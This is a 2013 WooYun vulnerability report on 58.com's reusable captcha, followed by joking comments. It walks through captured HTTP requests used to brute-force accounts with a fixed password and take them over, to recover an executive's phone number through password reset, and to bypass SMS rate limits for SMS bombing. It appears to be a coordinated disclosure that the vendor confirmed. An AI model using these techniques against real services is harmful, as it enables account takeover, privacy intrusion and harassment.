当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-038329

漏洞标题:58同城某处鸡肋设计缺陷的三种猥琐利用~

相关厂商:58同城

漏洞作者: niliu

提交时间:2013-09-27 12:18

修复时间:2013-11-11 12:19

公开时间:2013-11-11 12:19

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-27: 细节已通知厂商并且等待厂商处理中
2013-09-27: 厂商已经确认,细节仅向厂商公开
2013-10-07: 细节向核心白帽子及相关领域专家公开
2013-10-17: 细节向普通白帽子公开
2013-10-27: 细节向实习白帽子公开
2013-11-11: 细节向公众公开

简要描述:

#鸡肋烤的好了吃着也香~
#对之前提交的一个没有通过的鸡肋设计缺陷的三种猥琐利用~
#~1可修改他人账号密码并成功登陆~
#~2可获取58内部领导手机号~
#~3对获取的58内部领导手机号进行短信轰炸~

详细说明:

利用之前一个小缺陷可实现以下3个方面的利用
#~1可修改他人账号密码并成功登陆~
#~2可获取58内部领导手机号~
#~3对获取的58内部领导手机号进行短信轰炸~
---------------------------------------------------------------------
问题描述:验证码没有限制有效次数,可多次使用
#~1可修改他人账号密码并成功登陆~
登陆页面验证码无使用次数限制可暴力破解他人账号
首先以用户admin密码123456正常登陆几次,因为前几次登陆是没有验证码的,所以等弹出验证码后再登陆,登陆时抓包

1.jpg


POST /dounionlogin HTTP/1.1
Host: passport.58.com
Proxy-Connection: keep-alive
Content-Length: 556
Cache-Control: max-age=0
Origin: http://passport.58.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Maxthon/4.0.3.6000 Chrome/22.0.1229.79 Safari/537.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
DNT: 1
Referer: http://passport.58.com/login?path=http%3A%2F%2Fmy.58.com%2Fmyseekjob%2F1
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: @#¥…&%*%…#¥%
isweak=1&path=http%3A%2F%2Fmy.58.com%2Fmyseekjob%2F1%3Fpts%3D1380250216822&p1=81258169aec0e3c8bef5475baf3cb569&p2=662512780135bf0052f54e50140d8790&p3=81c7f75b45073d4e50c808255cfe48a244f7596a079ac943da4bdeadeb55efed7f7ee1ab4ebfeac9e6d8b834d2d7ccc2f16ab5ec3c4399416573963999eb7d212daf58024b346fc05101221973e354525894a5f4088e61446b9b7866be6aab6a7ee0012713a11c2d1e452fe13434b9064b2a1f94a18dbc65d90c43a66afebd31&timesign=1380250281659&ptk=ffe232eb18464856839b4b5c42a2e438&cd=1864&username=admin&password=password&validatecode=de22q&mcresult=48484849485349505453


然后以密码不变,对用户名参数username进行破解

2.jpg


根据测试得知返回包长度为628的可登陆成功
shi:123456 登陆时会跳转到一个更改密码的页面

3.jpg


旧密码就是123456,虽然需要填写手机接收验证码但是填写自己的可以成功接收并更改密码。
登陆截图
用户shi

4.jpg


用户简历

5.jpg


用户 xie

6.jpg


用户密码都被修改了,你说能干什么呢?
---------------------------------------------------------------------
#~2可获取58内部领导手机号~
找回密码页面验证码同样的问题,可根据邮箱找回密码获取用户手机号码
这里就对姚劲波的邮箱做个测试

http://passport.58.com/forgetpassword


填写好邮箱yaojb@58.com验证码提交

7.jpg


来到验证页面
根据提示可得知前7位手机号为13910**
后四位暂时写1111,提交时抓包

8.jpg


GET /forgetbymobile?mobile=13910**§1111§&validatecode=HDSZN HTTP/1.1
Host: passport.58.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Maxthon/4.0.3.6000 Chrome/22.0.1229.79 Safari/537.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
DNT: 1
Referer: http://passport.58.com/resetbymobile
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: #@##¥……&#¥


对手机号参数mobile的后四位1111进行破解

9.jpg


根据返回包才长度可得知手机号后四位为70**
这样就得到了姚劲波的手机号,当然不限于他的手机号,这里就不再做其他证明了。
---------------------------------------------------------------------
#~3对获取的58内部领导手机号进行短信轰炸~
得到手机号了有什么用处呢?
继续猥琐,手机号进行一次短信轰炸,当然这里掩饰就拿自己手机号测试~
利用之前的方法获取到真实手机号后,填写好,点发送确认码时抓包

GET /forgetbymobile?mobile=186******04&validatecode=pakpe HTTP/1.1
Host: passport.58.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Maxthon/4.0.3.6000 Chrome/22.0.1229.79 Safari/537.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
DNT: 1
Referer: https://passport.58.com/resetbymobile
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: @#¥%


这里前端虽然做了短信验证码接受时间限制,但是通过抓包发包可绕过限制进行短信轰炸~
拿自己手机测试截图

11.png


姚总日理万机我就不骚扰他了~

漏洞证明:

综上所述~

修复方案:

对验证码有效使用次数做限制~
顺便求个58的小礼物吧~
:D

版权声明:转载请注明来源 niliu@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2013-09-27 14:35

厂商回复:

感谢对58的关注和支持!我们会尽快修复处理!
晚些时候会索要联系方式,礼品是必须的!

最新状态:

暂无


漏洞评价:

评论

  1. 2013-09-27 12:24 | 360安全卫士 ( 路人 | Rank:10 漏洞数:1 | 360安全卫士就是好)

    化腐朽为神奇

  2. 2013-09-27 12:26 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    @360安全卫士 化鸡肋为鸡腿~

  3. 2013-09-27 12:30 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | 一切语言转汇编理论)

    @niliu 化鸡腿为全鸡

  4. 2013-09-27 12:33 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @寂寞的瘦子 化全鸡为鸡群

  5. 2013-09-27 12:42 | 小川 认证白帽子 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)

    @疯狗 化鸡群为鸡厂

  6. 2013-09-27 12:47 | 小威 ( 普通白帽子 | Rank:492 漏洞数:76 | 活到老,学到老!)

    @小川 化鸡场为鸡蛋

  7. 2013-09-27 13:05 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    @小威 化鸡蛋为蛋壳

  8. 2013-09-27 13:54 | Mas ( 实习白帽子 | Rank:42 漏洞数:15 )

    @niliu 化蛋壳为腐朽

  9. 2013-09-27 13:54 | Mas ( 实习白帽子 | Rank:42 漏洞数:15 )

    @niliu 化蛋壳为鸡肋

  10. 2013-09-27 14:10 | D&G ( 普通白帽子 | Rank:523 漏洞数:103 | going)

    @Mas 话鸡肋为牛排

  11. 2013-09-27 14:11 | Mas ( 实习白帽子 | Rank:42 漏洞数:15 )

    @D&G 跨目录跨的太牛逼了

  12. 2013-09-27 14:14 | Master ( 路人 | Rank:29 漏洞数:10 )

    @D&G 化牛排为牛群

  13. 2013-09-27 17:05 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    @Master 化牛群为wb

  14. 2013-09-27 17:10 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    @围剿 化wb为qb

  15. 2013-09-27 17:18 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | 一切语言转汇编理论)

    @niliu 化q币为妹子

  16. 2013-09-27 17:20 | ppt ( 路人 | Rank:11 漏洞数:2 | ) | ( 我猜出了用户名,可我没猜出密码。)

    @niliu 化qb为nb

  17. 2013-09-27 18:14 | iiiiiiiii ( 普通白帽子 | Rank:680 漏洞数:89 | )

    @ppt 化NB为神奇

  18. 2013-10-10 08:00 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    @58同城 放鸽子么

  19. 2013-10-10 09:07 | 小川 认证白帽子 ( 核心白帽子 | Rank:1344 漏洞数:216 | 一个致力要将乌云变成搞笑论坛的男人)

    @niliu 不会58会积攒一定能量后,然后一波发出去

  20. 2013-10-10 09:21 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    @小川 金滴么~ 赶紧爆发吧58

  21. 2013-10-16 14:27 | 58同城(乌云厂商)

    @niliu ^_^ 58是有节操的公司,请放心!!礼物应该收到了吧?希望继续关注58安全,感谢!

  22. 2013-10-16 14:55 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    @58同城 恩恩,收到了~~ 58同城,一个有节操的网站~~~

  23. 2013-10-27 15:20 | 雷锋 ( 路人 | Rank:12 漏洞数:2 | 承接:钻井,架工,木工,电工,水暖工,力...)

    礼物。。。

  24. 2013-10-27 16:24 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @niliu 啥东西?

  25. 2013-10-27 19:23 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    @px1624 恐龙妹

  26. 2013-10-27 20:45 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @niliu 公仔?

  27. 2013-10-27 21:37 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    @px1624 嗯哪,公仔~

  28. 2013-11-04 17:18 | noob ( 实习白帽子 | Rank:81 漏洞数:18 | 向各位大神学习,向各位大神致敬)

    mark,这个洞子告诉我们,鸡助不能丢

  29. 2013-11-11 12:20 | Black Angel ( 普通白帽子 | Rank:163 漏洞数:35 | 最神奇的一群人,智慧低调又内敛,俗称马甲...)

    化鸡巴为鸡蛋

  30. 2013-11-14 16:03 | 肉肉 认证白帽子 ( 普通白帽子 | Rank:112 漏洞数:10 | 肉肉在长亭科技,肉肉在长亭科技,肉肉在长...)

    说好的烤鸡肋呢